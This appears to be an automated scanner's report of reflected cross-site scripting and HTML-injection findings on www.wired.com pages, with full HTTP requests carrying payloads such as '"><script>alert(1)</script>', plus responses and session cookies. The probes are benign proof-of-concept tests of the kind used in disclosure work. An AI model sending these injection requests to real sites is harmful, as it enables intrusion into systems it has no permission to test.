GET /culture/art44d77"><a>f26f00f82f/magazine/15-11/pl_arts HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29283 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:16:41 GMT Date: Sun, 21 Nov 2010 23:06:41 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_culture ss_art44d77"><a>f26f00f82f c_magazine"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8e1d9"><a>1df8fb955e1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /culture/art/magazine8e1d9"><a>1df8fb955e1/15-11/pl_arts HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29285 Vary: Accept-Encoding Cache-Control: max-age=556 Expires: Sun, 21 Nov 2010 23:16:11 GMT Date: Sun, 21 Nov 2010 23:06:55 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_culture ss_art c_magazine8e1d9"><a>1df8fb955e1"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c26ce"><a>beebd8a9cd7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /culturec26ce"><a>beebd8a9cd7/art/magazine/16-09/ff_xray HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29285 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Sun, 21 Nov 2010 23:10:22 GMT Date: Sun, 21 Nov 2010 23:06:22 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_culturec26ce"><a>beebd8a9cd7 ss_art c_magazine"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c4a6e"><a>642ea85b965 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /culture/artc4a6e"><a>642ea85b965/magazine/16-09/ff_xray HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29285 Vary: Accept-Encoding Cache-Control: max-age=581 Expires: Sun, 21 Nov 2010 23:16:23 GMT Date: Sun, 21 Nov 2010 23:06:42 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_culture ss_artc4a6e"><a>642ea85b965 c_magazine"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2a844"><a>403dadf803e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /culture/art/magazine2a844"><a>403dadf803e/16-09/ff_xray HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29285 Vary: Accept-Encoding Cache-Control: max-age=546 Expires: Sun, 21 Nov 2010 23:16:05 GMT Date: Sun, 21 Nov 2010 23:06:59 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_culture ss_art c_magazine2a844"><a>403dadf803e"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72fa5"><a>049ef037e84 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /culture72fa5"><a>049ef037e84/art/multimedia/2008/05/gallery_faves_transportation_photos HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29319 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:16:43 GMT Date: Sun, 21 Nov 2010 23:06:43 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_culture72fa5"><a>049ef037e84 ss_art c_multimedia"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3f72b"><a>f7633aef4b8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /culture/art3f72b"><a>f7633aef4b8/multimedia/2008/05/gallery_faves_transportation_photos HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29319 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:17:09 GMT Date: Sun, 21 Nov 2010 23:07:09 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_culture ss_art3f72b"><a>f7633aef4b8 c_multimedia"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 851a2"><a>7554777a3ab was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /culture/art/multimedia851a2"><a>7554777a3ab/2008/05/gallery_faves_transportation_photos HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29319 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:17:23 GMT Date: Sun, 21 Nov 2010 23:07:23 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_culture ss_art c_multimedia851a2"><a>7554777a3ab"> ...[SNIP]...
1.481. http://www.wired.com/culture/art/multimedia/2008/05/gallery_faves_transportation_photos [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5504f"><script>alert(1)</script>a63a753d0ce was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /culture/art/multimedia/2008/05/gallery_faves_transportation_photos?5504f"><script>alert(1)</script>a63a753d0ce=1 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=UTF-8 Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:16:43 GMT Date: Sun, 21 Nov 2010 23:06:43 GMT Connection: close Connection: Transfer-Encoding Content-Length: 41600
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xht ...[SNIP]... <a href="javascript: void(window.open('/print/culture/art/multimedia/2008/05/gallery_faves_transportation_photos?5504f"><script>alert(1)</script>a63a753d0ce=1', 'printImage', 'height=800,width=1000,directories=no,location=no,menubar=no,resizable=yes,status=no,toolbar=no'))" id="printico" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aacf1"><a>9216975e40b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /cultureaacf1"><a>9216975e40b/art/multimedia/2008/07/ HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29284 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 22:09:17 GMT Date: Sun, 21 Nov 2010 21:59:17 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_cultureaacf1"><a>9216975e40b ss_art c_multimedia"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 49165"><a>72a7f1e5436 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /culture/art49165"><a>72a7f1e5436/multimedia/2008/07/ HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29284 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 22:09:35 GMT Date: Sun, 21 Nov 2010 21:59:35 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_culture ss_art49165"><a>72a7f1e5436 c_multimedia"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6bf9a"><a>2dcaf6e058c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /culture/art/multimedia6bf9a"><a>2dcaf6e058c/2008/07/ HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29284 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 22:09:48 GMT Date: Sun, 21 Nov 2010 21:59:48 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_culture ss_art c_multimedia6bf9a"><a>2dcaf6e058c"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 62137"><a>c291d377b9f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /culture62137"><a>c291d377b9f/art/multimedia/2008/07/TKTKTK HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29290 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:16:55 GMT Date: Sun, 21 Nov 2010 23:06:55 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_culture62137"><a>c291d377b9f ss_art c_multimedia"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b9075"><a>792f200a800 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /culture/artb9075"><a>792f200a800/multimedia/2008/07/TKTKTK HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29290 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:17:18 GMT Date: Sun, 21 Nov 2010 23:07:18 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_culture ss_artb9075"><a>792f200a800 c_multimedia"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4c218"><a>6790c22ef86 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /culture/art/multimedia4c218"><a>6790c22ef86/2008/07/TKTKTK HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29290 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:17:33 GMT Date: Sun, 21 Nov 2010 23:07:33 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_culture ss_art c_multimedia4c218"><a>6790c22ef86"> ...[SNIP]...
The value of the <img%20src request parameter is copied into the HTML document as plain text between tags. The payload 14661<script>alert(1)</script>f716d04df3f was submitted in the <img%20src parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the <img%20src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2ca4a"><script>alert(1)</script>649eec63546 was submitted in the <img%20src parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 74d3d"><a>9b77dfd8a23 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /culture74d3d"><a>9b77dfd8a23/art/multimedia/2008/07/gallery_faves_food HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29302 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 20:08:35 GMT Date: Sun, 21 Nov 2010 19:58:35 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_culture74d3d"><a>9b77dfd8a23 ss_art c_multimedia"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8cc69"><a>3cda8068985 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /culture/art8cc69"><a>3cda8068985/multimedia/2008/07/gallery_faves_food HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29302 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 20:08:49 GMT Date: Sun, 21 Nov 2010 19:58:49 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_culture ss_art8cc69"><a>3cda8068985 c_multimedia"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 85426"><a>aac868d772e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /culture/art/multimedia85426"><a>aac868d772e/2008/07/gallery_faves_food HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29302 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 20:09:36 GMT Date: Sun, 21 Nov 2010 19:59:36 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_culture ss_art c_multimedia85426"><a>aac868d772e"> ...[SNIP]...
The value of the f56a1"><script>alert(1)</script>HOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT request parameter is copied into the HTML document as plain text between tags. The payload 966a2<script>alert(1)</script>976c2c8bf57 was submitted in the f56a1"><script>alert(1)</script>HOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
